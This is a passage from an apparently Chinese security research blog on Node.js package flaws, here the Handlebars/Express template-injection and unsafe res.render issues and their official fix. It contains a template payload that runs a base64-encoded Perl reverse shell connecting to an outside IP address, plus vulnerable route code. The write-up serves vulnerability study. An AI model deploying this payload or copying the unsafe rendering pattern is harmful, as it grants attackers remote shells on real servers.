</span><span class="template-variable">&#123;&#123;<span class="name">this.pop</span>&#125;&#125;</span></span><br><span class="line"><span class="xml">        </span><span class="template-variable">&#123;&#123;<span class="name">this.push</span> <span class="string">&quot;return process.mainModule.require(&#x27;child_process&#x27;).exec(&#x27;echo cGVybCAtZSAndXNlIFNvY2tldDskaT0iODEuNjkuMjAxLjY1IjskcD0xMjM0O3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCI+JlMiKTtvcGVuKFNURE9VVCwiPiZTIik7b3BlbihTVERFUlIsIj4mUyIpO2V4ZWMoIi9iaW4vc2ggLWkiKTt9Oyc=|base64 -d|bash&#x27;);&quot;</span>&#125;&#125;</span></span><br><span class="line"><span class="xml">        </span><span class="template-variable">&#123;&#123;<span class="name">this.pop</span>&#125;&#125;</span></span><br><span class="line"><span class="xml">        </span><span class="template-tag">&#123;&#123;#<span class="name"><span class="builtin-name">each</span></span> conslist&#125;&#125;</span></span><br><span class="line"><span class="xml">          </span><span class="template-tag">&#123;&#123;#<span class="name"><span class="builtin-name">with</span></span> (<span class="name">string.sub.apply</span> <span class="number">0</span> codelist)&#125;&#125;</span></span><br><span class="line"><span class="xml">            </span><span class="template-variable">&#123;&#123;<span class="name">this</span>&#125;&#125;</span></span><br><span class="line"><span class="xml">          </span><span class="template-tag">&#123;&#123;/<span class="name"><span class="builtin-name">with</span></span>&#125;&#125;</span></span><br><span class="line"><span class="xml">        </span><span class="template-tag">&#123;&#123;/<span class="name"><span class="builtin-name">each</span></span>&#125;&#125;</span></span><br><span class="line"><span class="xml">      </span><span class="template-tag">&#123;&#123;/<span class="name"><span class="builtin-name">with</span></span>&#125;&#125;</span></span><br><span class="line"><span class="xml">    </span><span class="template-tag">&#123;&#123;/<span class="name"><span class="builtin-name">with</span></span>&#125;&#125;</span></span><br><span class="line"><span class="xml">  </span><span class="template-tag">&#123;&#123;/<span class="name"><span class="builtin-name">with</span></span>&#125;&#125;</span></span><br><span class="line"><span class="template-tag">&#123;&#123;/<span class="name"><span class="builtin-name">with</span></span>&#125;&#125;</span></span><br><span class="line"><span class="xml">&#123;% endraw %&#125;</span></span><br></pre></td></tr></table></figure>

<p>这样就可以getshell了。</p>
<h2 id="未对输入进行严格取值"><a href="#未对输入进行严格取值" class="headerlink" title="未对输入进行严格取值"></a>未对输入进行严格取值</h2><p>这种情况更加常见，因为程序员们喜欢这样子做来显得代码更加有条理性，（也更方便）</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">router.post(<span class="string">&#x27;/&#x27;</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res, next</span>) </span>&#123;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">var</span> profile = req.body.profile</span><br><span class="line"> 	res.render(<span class="string">&#x27;index&#x27;</span>, profile)</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<p>直接将用户的取值进行渲染，但是用户的输入可以是数组，所以</p>
<p><img src="image-20210627175144942.png" alt="image-20210627175144942"></p>
<p>即可任意文件读取并进行RCE</p>
<h2 id="官方修复："><a href="#官方修复：" class="headerlink" title="官方修复："></a>官方修复：</h2><p>在新版本当中官方对hbs的渲染做出了限制（这让我头大了很久</p>
<p><img src="image-20210627175610188.png" alt="image-20210627175610188"></p>
<p>新版本中，不再会直接进行渲染了，而是会check用户的输入，如果渲染的目标为对象，则会抛出异常。</p>
<p><img src="image-20210627175450858.png" alt="image-20210627175450858"></p>
<p>这里还对异常信息的抛出做出了 check，必须是字符串才可以。。</p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title='0' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                        
                            <li title='1' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
		data-enable='true'
        data-ae='false'
        data-ci=''
        data-cs=''
        data-r='https://github.com/ysllz/ysllz.github.io'
        data-o='https://github.com/ysllz/ysllz.github.io'
        data-a='ysllz'
        data-d='false'
    >查看评论</div>


    </div>
    
        <div class='side'>
			<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1-ronomon-opened"><span class="toc-number">1.</span> <span class="toc-text">1. @ronomon&#x2F;opened</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2-js-extend"><span class="toc-number">2.</span> <span class="toc-text">2.js-extend</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3-nedb"><span class="toc-number">3.</span> <span class="toc-text">3.nedb</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4-systeminformation"><span class="toc-number">4.</span> <span class="toc-text">4.systeminformation</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#si-inetLatency"><span class="toc-number">4.1.</span> <span class="toc-text">si.inetLatency</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#5-underscore"><span class="toc-number">5.</span> <span class="toc-text">5.underscore</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A6%82%E8%BF%B0"><span class="toc-number">5.1.</span> <span class="toc-text">概述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%89%88%E6%9C%AC"><span class="toc-number">5.2.</span> <span class="toc-text">版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POC"><span class="toc-number">5.3.</span> <span class="toc-text">POC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0%E8%BF%87%E7%A8%8B%EF%BC%9A"><span class="toc-number">5.4.</span> <span class="toc-text">复现过程：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#6-hbs%E6%A1%86%E6%9E%B6%E4%B8%8Eexpress%E7%9A%84%E7%BC%BA%E9%99%B7"><span class="toc-number">6.</span> <span class="toc-text">6. hbs框架与express的缺陷</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#7-ffmpeg-normalize"><span class="toc-number">7.</span> <span class="toc-text">7.ffmpeg-normalize</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#8-prisma"><span class="toc-number">8.</span> <span class="toc-text">8.prisma</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#9-%E5%85%B3%E4%BA%8Ehbs%E8%BF%98%E5%B0%B1%E9%82%A3%E4%B8%AA%E8%B8%A9%E5%9D%91"><span class="toc-number">9.</span> <span class="toc-text">9. 关于hbs还就那个踩坑</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93"><span class="toc-number">9.1.</span> <span class="toc-text">原型链污染</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AA%E5%AF%B9%E8%BE%93%E5%85%A5%E8%BF%9B%E8%A1%8C%E4%B8%A5%E6%A0%BC%E5%8F%96%E5%80%BC"><span class="toc-number">9.2.</span> <span class="toc-text">未对输入进行严格取值</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%98%E6%96%B9%E4%BF%AE%E5%A4%8D%EF%BC%9A"><span class="toc-number">9.3.</span> <span class="toc-text">官方修复：</span></a></li></ol></li></ol>	
        </div>
    
</div>


    </div>
</div>
</body>

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
